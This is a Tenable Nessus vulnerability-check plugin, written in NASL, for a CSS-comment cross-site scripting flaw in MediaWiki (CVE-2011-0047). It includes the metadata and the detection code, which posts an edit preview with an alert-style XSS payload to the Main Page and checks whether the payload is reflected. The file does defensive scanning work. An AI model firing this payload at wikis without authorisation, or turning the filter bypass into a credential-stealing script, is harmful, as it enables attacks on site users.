CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
Confidence
High
EPSS
Percentile
72.3%
There is a cross-site scripting vulnerability in this installation of MediaWiki that may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user. Such script code could steal authentication credentials and be used to launch other attacks.
This version of MediaWiki also contains a local file inclusion vulnerability that is exploitable when running Microsoft Windows, but this plugin did not test for that vulnerability.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(51998);
script_version("1.13");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");
script_cve_id("CVE-2011-0047");
script_bugtraq_id(46108);
script_xref(name:"SECUNIA", value:"43142");
script_name(english:"MediaWiki CSS Comments XSS");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a version of MediaWiki vulnerable to a
cross-site scripting attack.");
script_set_attribute(attribute:"description", value:
"There is a cross-site scripting vulnerability in this installation of
MediaWiki that may allow an attacker to execute arbitrary script code
in the browser of an unsuspecting user. Such script code could steal
authentication credentials and be used to launch other attacks.
This version of MediaWiki also contains a local file inclusion
vulnerability that is exploitable when running Microsoft Windows, but
this plugin did not test for that vulnerability.");
# http://lists.wikimedia.org/pipermail/mediawiki-announce/2011-February/000095.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?5c3c879f");
script_set_attribute(attribute:"see_also", value:"https://bugzilla.wikimedia.org/show_bug.cgi?id=27093");
script_set_attribute(attribute:"see_also", value:"https://bugzilla.wikimedia.org/show_bug.cgi?id=27094");
script_set_attribute(attribute:"solution", value:
"Upgrade to MediaWiki 1.16.2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
script_set_attribute(attribute:"vuln_publication_date", value:"2011/02/01");
script_set_attribute(attribute:"patch_publication_date", value:"2011/02/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2011/02/16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:mediawiki:mediawiki");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses : XSS");
script_copyright(english:"This script is Copyright (C) 2011-2024 Tenable Network Security, Inc.");
script_dependencies("mediawiki_detect.nasl");
script_require_keys("installed_sw/MediaWiki", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
app = "MediaWiki";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
function try_exploit(title)
{
local_var bound, boundary, eol, headers, post, res, xss, output;
eol = '\r\n';
bound = 'NESSUS';
boundary = '--' + bound;
xss = '<div style="background-image:ur/*//*/l(javascript:alert('XSS'))">NESSUS TEST</div>';
# Format the post data into the format the server needs.
post = boundary + eol;
post += 'Content-Disposition: form-data; name="wpTextbox1"' + eol;
post += eol;
post += xss + eol;
post += boundary + "--" + eol;
headers = make_array(
"Content-Type", "multipart/form-data; boundary=" + bound
);
# Try to preview an edit to the main page w/ some XSS in a CSS attribute.
res = http_send_recv3(
item : dir + "/index.php?title=" + title + "&action=submit",
add_headers : headers,
method : "POST",
data : post,
port : port,
exit_on_fail : TRUE
);
# If our XSS isn't somewhere on the page, we've failed. Note that
# this won't match the contents of the textarea because the
# less-than signs will be HTML entities in there.
if (xss >!< res[2]) return FALSE;
output = extract_pattern_from_resp(string:res[2], pattern:'ST:' + xss);
if (empty_or_null(output)) output = strstr(res[2], xss);
security_report_v4(
port : port,
severity : SECURITY_WARNING,
generic : TRUE,
xss : TRUE, # Sets XSS KB item
line_limit : 6,
request : make_list(http_last_sent_request()),
output : chomp(output)
);
return TRUE;
}
# Try to exploit the CSS comment injection vulnerability. When initially
# installed, MediaWiki allows the Main Page to be anonymously edited.
if (!try_exploit(title:"Main_Page"))
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, build_url(port:port, qs:dir));